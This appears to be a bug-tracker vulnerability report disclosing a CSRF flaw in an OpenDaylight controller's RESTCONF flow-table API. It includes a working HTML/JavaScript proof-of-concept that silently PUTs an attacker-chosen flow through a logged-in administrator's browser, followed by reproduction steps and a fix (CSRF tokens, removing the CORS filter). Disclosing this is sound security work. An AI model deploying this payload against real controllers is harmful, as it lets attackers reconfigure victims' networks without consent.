Brief of this vulnerability
Attacker can insert or modify the entry of flow table. This attack was verified on Sodium-SR1. Although not tested in other versions, it is expected to be applicable.
Description
HI I found csrf bug on flow table inserting and modifying. It can be dangerous for admin. The victim admin can insert the attacker's intended flow into the flow table.
CSRF POC is below :
<meta charset="utf-8"> <script src="http://code.jquery.com/jquery-latest.min.js"></script> <script language ="javascript" type = "text/javascript" > var createCORSRequest = function(method, url) { var xhr = new XMLHttpRequest(); if ("withCredentials" in xhr) { // Most browsers. xhr.open(method, url, true); } else if (typeof XDomainRequest != "undefined") { // IE8 & IE9 xhr = new XDomainRequest(); xhr.open(method, url); } else { // CORS not supported. xhr = null; } return xhr; }; var url = 'http://127.0.0.1:8181/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/0/flow/1'; var method = 'PUT'; var xhr = createCORSRequest(method, url); xhr.onload = function() { // Success code goes here. }; xhr.onerror = function() { // Error code goes here. }; xhr.setRequestHeader('Content-Type', 'application/xml') xhr.withCredentials = true; xhr.send('<?xml version="1.0" encoding="UTF-8" standalone="no"?><flow xmlns="urn:opendaylight:flow:inventory"><priority>4</priority><flow-name>asdfa</flow-name><match><ethernet-match><ethernet-type><type>2048</type></ethernet-type></ethernet-match><ipv4-destination>10.0.0.1/24</ipv4-destination></match><id>1</id><table_id>0</table_id><instructions><instruction><order>0</order><apply-actions><action><order>0</order><dec-nw-ttl/></action></apply-actions></instruction></instructions></flow>'); </script>
This attack is an example because ODL itself is vulnerable to CSRF attacks.
In fact, for any function that sets ODL controller using REST API, we can make arbitrary malicious settings using CSRF attack.
If an administrator accesses an arbitrary web page created by an attacker, Floodlight can be configured with arbitrary settings
To Reproduce:
- Administrator's benign access
- Administrator logged in to the dlux gui via the browser with admin account
- Administrator accesses ODL controller using REST API in browser with admin account
- Administrator visits the malicious webpage
Solution:
- Check CSRF tokens in all request.
- duplicates
-
AAA-213 Remove CORS filter from shiro-impl
- Resolved